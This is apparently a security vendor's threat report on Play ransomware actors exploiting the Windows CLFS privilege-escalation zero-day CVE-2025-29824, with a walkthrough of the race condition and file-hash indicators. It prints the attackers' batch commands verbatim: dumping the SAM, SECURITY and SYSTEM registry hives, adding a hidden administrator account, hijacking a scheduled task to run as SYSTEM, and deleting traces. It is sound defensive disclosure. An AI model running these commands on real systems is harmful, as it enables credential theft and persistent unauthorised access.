Ransomware Attackers Leveraged Privilege Escalation Zero-day

Attackers linked to the Play ransomware operation deployed a zero-day privilege escalation exploit during an attempted attack against an organization in the U.S. The attack occurred prior to the disclosure and patching of a Windows elevation of privilege zero-day vulnerability (CVE-2025-29824) in the Common Log File System Driver (clfs.sys) on April 8, 2025. 

Although no ransomware payload was deployed in the intrusion, the attackers deployed the Grixba infostealer, which is a custom tool associated with Balloonfly, the attackers behind the Play ransomware operation.

Balloonfly is a cybercrime group that has been active since at least June 2022 and uses the Play ransomware (also known as PlayCrypt) in attacks. The group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe.

Attack analysis

The initial infection vector may have been a public facing Cisco ASA firewall. The attackers moved by unknown means to another, Windows machine on the targeted network. 

During the attack, the Balloonfly operators deployed a variety of samples and hacktools in addition to the Grixba infostealer and the exploit for CVE-2025-29824 on this machine. Some of the samples aren’t available to us at the moment of writing, but they were located in the Music folder with suspicious names masquerading as Palo Alto software (paloaltoconfig.exe, paloaltoconfig.dll) or, for example, 1day.exe.

To gather information on all the available machines in the victims’ Active Directory, the attackers executed the following command and saved the output to C:\Users\[REDACTED]\Music\AllWindows.csv file.

powershell Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select comment, description, Name, DNSHostName, OperatingSystem, LastLogonDate, ipv4address | Export-CSV C:\Users\[REDACTED]\Music\AllWindows.csv -NoTypeInformation -Encoding UTF8

Exploit execution

The attackers elevated privileges by exploiting a vulnerability in the Common Log File System (CLFS) kernel driver.

In order to interact with the driver, the exploit calls the CreateFileW() API, passing the string "\\.\LOG:\??\C:\ProgramData\SkyPDF\PDUDrv" as the lpFileName parameter. During that API call, the Windows kernel allocates a new FILE_OBJECT structure to represent that particular instance of a file open operation and then sends a request to the CLFS driver as identified by the "\\.\LOG:" filename prefix. The request is represented as an I/O Request Packet (IRP) with the major function code IRP_MJ_CREATE and instructs the driver to perform the actual open operation. Acting on this request, the driver allocates additional structures, including an undocumented structure, CClfsLogCcb. A pointer to the created CClfsLogCcb structure is stored in the FsContext2 field of the FILE_OBJECT structure, suggesting that the CClfsLogCcb structure could be a Context Control Block associated with that file open operation. Finally, the Windows kernel allocates a new file handle that refers to the created FILE_OBJECT structure. The exploit then attempts to perform two I/O operations around the same time on that file handle by calling different APIs from two threads.

From the first thread, the exploit calls the CloseHandle() API. During that API call, the Windows kernel closes the only file handle associated with the FILE_OBJECT structure previously discussed. To notify the driver that all outstanding file handles for the FILE_OBJECT structure have been closed, the Windows kernel sends an I/O Request Packet (IRP) with the major function code IRP_MJ_CLEANUP to the CLFS driver. When handling this request, the vulnerable versions of the driver deallocate the structure CClfsLogCcb.

From the second thread, the exploit calls the DeviceIoControl() API. The internal operations performed by the Windows kernel during that API call are determined by the sequence of operations across the two threads. In a particular scenario, the Windows kernel completes a lookup for the FILE_OBJECT structure referred to by the file handle during the DeviceIoControl() API call before the other thread closes the handle. The Windows kernel then sends an I/O Request Packet (IRP) with the major function code IRP_MJ_DEVICE_CONTROL to the CLFS driver that instructs the driver to perform the actual operation. That specific operation was picked when developing the exploit and involves the structure CClfsLogCcb.

However, the Windows kernel does not guarantee the relative ordering of the IRP_MJ_CLEANUP request from the first thread and the IRP_MJ_DEVICE_CONTROL request from the second thread. For example, the IRP_MJ_CLEANUP request may complete first, deallocating the structure CClfsLogCcb, before the IRP_MJ_DEVICE_CONTROL request is sent do the driver. And then, when handling the IRP_MJ_DEVICE_CONTROL request, the CLFS driver uses the memory pointer from the FsContext2 field of the FILE_OBJECT structure, which still refers to the location of the already deallocated structure CClfsLogCcb, to operate on unexpected data. This is abused by the exploit to modify the kernel memory.

During the execution of the exploit, two files are created in the path C:\ProgramData\SkyPDF. The first file, PDUDrv.blf, is a Common Log File System base log file and is an artifact created during exploitation. The second file, clssrv.inf, is a DLL that is injected into the winlogon.exe process. This DLL has the ability to drop two additional batch files.

The first batch file, called servtask.bat, is stored in the “C:\ProgramData” folder. This file is used to elevate privileges and dump the SAM, SYSTEM, and SECURITY Registry hives and to create a new user named LocalSvc and add it to the Administrator group.

mkdir C:\\ProgramData\\Events &

echo Yes | reg save hklm\\sam C:\\ProgramData\\Events\\Errors.evt &

echo Yes | reg save hklm\\security C:\\ProgramData\\Events\\Logs.evt &

echo Yes | reg save hklm\\system C:\\ProgramData\\Events\\Jobs.evt &

net user /add LocalSvc Dc_34%gfE62cvsa &

powershell.exe \"Add-LocalGroupMember -SID \"S-1-5-32-544\" -Member \"LocalSvc\"\" &

net localgroup Administrators LocalSvc /add &

reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f &

reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v LocalSvc" /d 0 /t REG_DWORD &

icacls C:\\ProgramData\\Events /grant Everyone:F /inheritance:e /T &

call C:\\ProgramData\\cmdpostfix.bat &

timeout /t 3600 &

sc stop StorSvc &

sc start StorSvc &

del C:\\ProgramData\\Events\\Errors.evt &

del C:\\ProgramData\\Events\\Logs.evt &

del C:\\ProgramData\\Events\\Jobs.evt &

del C:\\ProgramData\\Events\\Tasks.evt &

del C:\\ProgramData\\Events\\Tmp.evt &

del C:\\ProgramData\\Events\\out.zip &

schtasks /Create /F /xml C:\\ProgramData\\CacheTask.xml /TN \\Microsoft\\Windows\\Wininet\\CacheTask &

rmdir C:\\ProgramData\\Events &

del C:\\ProgramData\\CacheTask.xml &

del C:\\ProgramData\\cmdpostfix.bat &

del C:\\ProgramData\\servtask.bat

The second batch file, named cmdpostfix.bat, is also created in the “C:\ProgramData” folder and is used to clean up the artifacts created by the exploit:

del C:\\ProgramData\\SkyPDF\\PDUDrv.blf &

del C:\\ProgramData\\SkyPDF\\ClsSrv.inf &

rmdir C:\\ProgramData\\SkyPDF

Ultimately, the exploit executes the aforementioned batch files via the following commands:

• schtasks /Query /xml /TN \\Microsoft\\Windows\\Wininet\\CacheTask > C:\\ProgramData\\CacheTask.xml
• schtasks /Change /RU SYSTEM /TN \\Microsoft\\Windows\\Wininet\\CacheTask /TR C:\\ProgramData\\servtask.bat
• schtasks /Run /TN \\Microsoft\\Windows\\Wininet\\CacheTask

Exploitation by multiple actors

The exploit (or similar exploits) may have been in the hands of multiple actors prior to the patching of CVE-2025-29824. When patching the vulnerability, Microsoft said that it had been exploited against a “small number of targets,” including organizations in the U.S., Venezuela, Spain, and Saudi Arabia. Microsoft said that the exploit had been deployed by the PipeMagic malware, which is often used by a group called Storm-2460 to deploy ransomware. 

The nature of the exploitation by Storm-2460 appears different from the Balloonfly-linked activity discovered by Symantec. Microsoft said that the exploit had been launched in memory from a dllhost.exe process. The exploitation discovered by Symantec was not fileless.

Rare ransomware zero-day

While the use of zero-day vulnerabilities by ransomware actors is rare, it is not unprecedented. Last year Symantec found evidence that attackers linked to the Black Basta ransomware may have been exploiting a recently patched Windows privilege escalation vulnerability (CVE-2024-26169) as a zero-day. 

That vulnerability was patched on March 12, 2024, and, at the time, Microsoft said there was no evidence of its exploitation in the wild. However, analysis of an exploit tool revealed evidence that it could have been compiled prior to patching, meaning at least one group may have been exploiting the vulnerability as a zero-day. 

Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.

Indicators of Compromise

If an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.

6030c4381b8b5d5c5734341292316723a89f1bdbd2d10bb67c4d06b1242afd05 - gt_net.exe - Infostealer.Grixba

858efe4f9037e5efebadaaa70aa8ad096f7244c4c4aeade72c51ddad23d05bfe – go.exe — CVE-2025-29824 exploit

9c21adbcb2888daf14ef55c4fa1f41eaa6cbfbe20d85c3e1da61a96a53ba18f9 — clssrv.inf — Exploit DLL payload

6d7374b4f977f689389c7155192b5db70ee44a7645625ecf8163c00da8828388 — cmdpostfix.bat — Batch file

b2cba01ae6707ce694073018d948f82340b9c41fb2b2bc49769f9a0be37071e1 — servtask.bat — Batch file

293b455b5b7e1c2063a8781f3c169cf8ef2b1d06e6b7a086b7b44f37f55729bd — paloaltoconfig.dll — Unknown file

af260c172baffd0e8b2671fd0c84e607ac9b2c8beb57df43cf5df6e103cbb7ad — paloaltoconfig.exe — Unknown file

430d1364d0d0a60facd9b73e674faddf63a8f77649cd10ba855df7e49189980b — 1day.exe — Unknown file

ba05d05d51d4f7bfceb3821a3754e7432248f5c3d5a450391a0631d56bbce4c2 — fappsettingslib.dll — Unknown file

b3ee068bf282575ac7eb715dd779254889e0b8a55aba2b7a1700fc8aa4dcb1da — w64stdlib.dll — Unknown file